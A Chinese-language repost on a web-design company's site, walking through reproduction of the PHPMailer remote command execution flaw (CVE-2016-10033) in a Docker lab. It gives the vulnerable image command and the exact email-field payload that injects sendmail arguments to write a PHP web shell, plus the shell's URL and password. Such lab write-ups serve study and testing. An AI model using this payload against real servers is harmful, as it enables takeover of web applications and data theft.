PHPMailer中怎么复现远程命令执行漏洞

PHPMailer中怎么复现远程命令执行漏洞，相信很多没有经验的人对此束手无策，为此本文总结了问题出现的原因和解决方法，通过这篇文章希望你能解决这个问题。

我们提供的服务有：成都网站设计、成都网站建设、微信公众号开发、网站优化、网站认证、湖里ssl等。为上千多家企事业单位解决了网站和推广的问题。提供周到的售前咨询和贴心的售后服务，是有科学管理、有技术的湖里网站制作公司

一、漏洞简介

PHPMailer是PHP电子邮件创建及传输类，用于多个开源项目：WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞，可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码，远程控制目标web应用。

二、影响版本：

PHPMailer<5.2.18

三、漏洞复现

Docker环境：

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去镜像启动环境：

PHPMailer中怎么复现远程命令执行漏洞

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name处随便输入比如“aaa”，在email处输入："aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message处输入一句话木马：

PHPMailer中怎么复现远程命令执行漏洞

上传完一句话木马后，页面会响应3-5分钟，响应时间较长

PHPMailer中怎么复现远程命令执行漏洞

木马地址：http://192.168.1.107:8080/a.php 密码：thelostworld

PHPMailer中怎么复现远程命令执行漏洞

虚拟终端：

PHPMailer中怎么复现远程命令执行漏洞

使用脚本：

获取脚本后台回复“PHPMailer”获取脚本

PHPMailer中怎么复现远程命令执行漏洞

看完上述内容，你们掌握PHPMailer中怎么复现远程命令执行漏洞的方法了吗？如果还想学到更多技能或想了解更多相关内容，欢迎关注创新互联行业资讯频道，感谢各位的阅读！

网页标题：PHPMailer中怎么复现远程命令执行漏洞
文章路径：http://lszwz.com/article/pccgho.html

其他资讯

售后响应及时

7×24小时客服热线

数据备份

更安全、更高效、更稳定

价格公道精准

项目经理精准报价不弄虚作假

合作无风险

重合同讲信誉，无效全额退款

乐山小谭建站工作室是一家专注从事于高品质视觉体验及互联网设计开发，乐山网站建设，乐山网站设计，乐山网页设计，乐山网站制作，品牌网站建设，营销网站建设，集团网站建设，企业网站建设，外贸网站建设，响应式网站建设，小程序开发，微信开发，企业形象设计，企业宣传视频等服务，小谭建站位于乐山市龙岗区大运软件小镇，小谭建站拥有经验丰富的高级网站建设工程师和一流的网页高端设计人员，具备各种规模与类型网站建设的雄厚实力，在网站建设领域树立了自己独特的设计风格。

友情链接交换友情链接

成都画册设计企业官网建设广安网站设计成都气球装饰专业网站设计江油做网站双流能亿建站崇州搬家公司成都托管服务器化妆品企业网站建设方案

Copyright © 2022 青羊区小谭信息技术咨询服务工作室乐山建站工作室 All Rights Reserved 蜀ICP备2021004003号-25

Copyright © 2022 青羊区小谭信息技术咨询服务工作室乐山建站工作室

蜀ICP备2021004003号-25